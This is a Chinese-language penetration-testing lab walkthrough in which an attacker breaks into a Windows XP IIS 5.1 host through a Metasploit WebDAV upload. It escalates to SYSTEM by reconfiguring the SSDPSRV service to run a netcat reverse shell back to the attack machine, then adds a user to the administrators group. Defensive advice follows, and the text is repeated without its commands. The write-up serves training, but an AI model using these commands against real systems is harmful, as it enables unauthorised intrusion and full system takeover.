渗透测试案例三：IIS WebDAV漏洞利用与Windows服务提权

0x00 实验环境

攻击机: Kali Linux (IP: 10.11.0.90)
目标靶机: Windows XP SP1 (IP: 10.11.1.13)

0x01 信息收集与初步渗透

1. 端口扫描

使用nmap进行端口扫描：

nmap -sS -sV -p 1-1024 -Pn 10.11.1.13

扫描结果：

21/tcp open ftp (Microsoft ftpd)
80/tcp open http (Microsoft IIS httpd 5.1)

2. FTP匿名登录检查

ftp 10.11.1.13

使用用户名anonymous和任意密码可成功登录，发现存在以下目录：

AdminScripts
ftproot
iissamples
Scripts
wwwroot

3. IIS WebDAV漏洞利用

发现目标运行IIS 5.1，搜索到IIS WebDAV Write Access Code Execution漏洞，使用Metasploit模块：

msf > use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(iis_webdav_upload_asp) > set RHOST 10.11.1.13
msf exploit(iis_webdav_upload_asp) > set PATH /hahaha.asp
msf exploit(iis_webdav_upload_asp) > run

成功获取meterpreter会话，但权限为BOB\IWAM_BOB，非SYSTEM权限。

0x02 权限提升

1. 系统信息收集

meterpreter > getuid
Server username: BOB\IWAM_BOB

meterpreter > sysinfo
Computer: BOB
OS: Windows XP (Build 2600, Service Pack 1)
Architecture: x86
System Language: en_US
Domain: WORKGROUP
Logged On Users: 3
Meterpreter: x86/windows

2. 提权工具准备

上传必要工具到目标系统：

accesschk_xp.exe - 检查权限的工具
nc.exe - netcat用于反弹shell

meterpreter > upload accesschk_xp.exe c:\\inetpub\\accesschk_xp.exe
meterpreter > upload nc.exe c:\\inetpub\\nc.exe

3. 查找可写服务

检查当前用户(IWAM_BOB)具有写权限的Windows服务：

C:\Inetpub>accesschk_xp.exe /accepteula -uwcqv IWAM_BOB * > ack.txt

发现两个可写服务：

SSDPSRV
upnphost

4. 服务权限分析

检查SSDPSRV服务的权限配置：

C:\Inetpub>accesschk_xp.exe /accepteula -ucqv SSDPSRV

结果显示该服务可以使用NT AUTHORITY\SYSTEM权限运行。

5. 服务配置修改

修改SSDPSRV服务配置，使其执行nc反弹shell：

C:\Inetpub>sc qc SSDPSRV
C:\Inetpub>sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 10.11.0.90 9090 -e cmd.exe"
C:\Inetpub>sc config SSDPSRV obj= ".\LocalSystem" password= ""
C:\Inetpub>sc config SSDPSRV start= "demand"

6. 启动服务获取SYSTEM权限

在攻击机上开启监听：

root@kali:~# nc -lvvp 9090

在目标机上启动服务：

C:\Inetpub>net start SSDPSRV

成功获取SYSTEM权限的shell。

7. 后渗透操作

将当前用户(IWAM_BOB)加入管理员组：

C:\WINDOWS\system32>net localgroup administrators IWAM_BOB /add

查找flag文件：

C:\>dir /b /s proof.txt
C:\Documents and Settings\Administrator\Desktop\proof.txt

0x03 技术要点总结

信息收集阶段：
- 使用nmap进行端口扫描和服务识别
- 检查常见服务的默认/匿名访问权限
初始渗透阶段：
- 利用IIS 5.1的WebDAV写权限漏洞上传webshell
- 使用Metasploit框架自动化利用漏洞
权限提升阶段：
- 识别不安全的服务权限配置
- 使用accesschk工具检查当前用户的权限
- 修改服务配置以执行任意命令
- 利用服务的高权限执行反弹shell
后渗透阶段：
- 将当前用户提升为管理员
- 查找系统敏感信息(如proof.txt)

0x04 防御建议

服务加固：
- 限制服务的执行权限
- 定期审核服务配置
漏洞修复：
- 及时更新IIS和Windows系统补丁
- 禁用不必要的服务(如WebDAV)
权限控制：
- 遵循最小权限原则
- 限制匿名访问权限
监控措施：
- 监控服务配置变更
- 设置文件完整性检查

0x05 参考工具

信息收集：
- nmap
- ftp客户端
漏洞利用：
- Metasploit框架
- IIS WebDAV漏洞利用模块
权限提升：
- accesschk.exe
- netcat(nc.exe)
- Windows服务管理命令(sc)
后渗透：
- Windows系统命令
- 文件搜索工具

渗透测试案例三：IIS WebDAV漏洞利用与Windows服务提权 0x00 实验环境攻击机 : Kali Linux (IP: 10.11.0.90) 目标靶机 : Windows XP SP1 (IP: 10.11.1.13) 0x01 信息收集与初步渗透 1. 端口扫描使用nmap进行端口扫描：扫描结果： 21/tcp open ftp (Microsoft ftpd) 80/tcp open http (Microsoft IIS httpd 5.1) 2. FTP匿名登录检查使用用户名 anonymous 和任意密码可成功登录，发现存在以下目录： AdminScripts ftproot iissamples Scripts wwwroot 3. IIS WebDAV漏洞利用发现目标运行IIS 5.1，搜索到IIS WebDAV Write Access Code Execution漏洞，使用Metasploit模块：成功获取meterpreter会话，但权限为 BOB\IWAM_BOB ，非SYSTEM权限。 0x02 权限提升 1. 系统信息收集 2. 提权工具准备上传必要工具到目标系统： accesschk_xp.exe - 检查权限的工具 nc.exe - netcat用于反弹shell 3. 查找可写服务检查当前用户(IWAM_ BOB)具有写权限的Windows服务：发现两个可写服务： SSDPSRV upnphost 4. 服务权限分析检查SSDPSRV服务的权限配置：结果显示该服务可以使用 NT AUTHORITY\SYSTEM 权限运行。 5. 服务配置修改修改SSDPSRV服务配置，使其执行nc反弹shell： 6. 启动服务获取SYSTEM权限在攻击机上开启监听：在目标机上启动服务：成功获取SYSTEM权限的shell。 7. 后渗透操作将当前用户(IWAM_ BOB)加入管理员组：查找flag文件： 0x03 技术要点总结信息收集阶段：使用nmap进行端口扫描和服务识别检查常见服务的默认/匿名访问权限初始渗透阶段：利用IIS 5.1的WebDAV写权限漏洞上传webshell 使用Metasploit框架自动化利用漏洞权限提升阶段：识别不安全的服务权限配置使用accesschk工具检查当前用户的权限修改服务配置以执行任意命令利用服务的高权限执行反弹shell 后渗透阶段：将当前用户提升为管理员查找系统敏感信息(如proof.txt) 0x04 防御建议服务加固：限制服务的执行权限定期审核服务配置漏洞修复：及时更新IIS和Windows系统补丁禁用不必要的服务(如WebDAV) 权限控制：遵循最小权限原则限制匿名访问权限监控措施：监控服务配置变更设置文件完整性检查 0x05 参考工具信息收集： nmap ftp客户端漏洞利用： Metasploit框架 IIS WebDAV漏洞利用模块权限提升： accesschk.exe netcat(nc.exe) Windows服务管理命令(sc) 后渗透： Windows系统命令文件搜索工具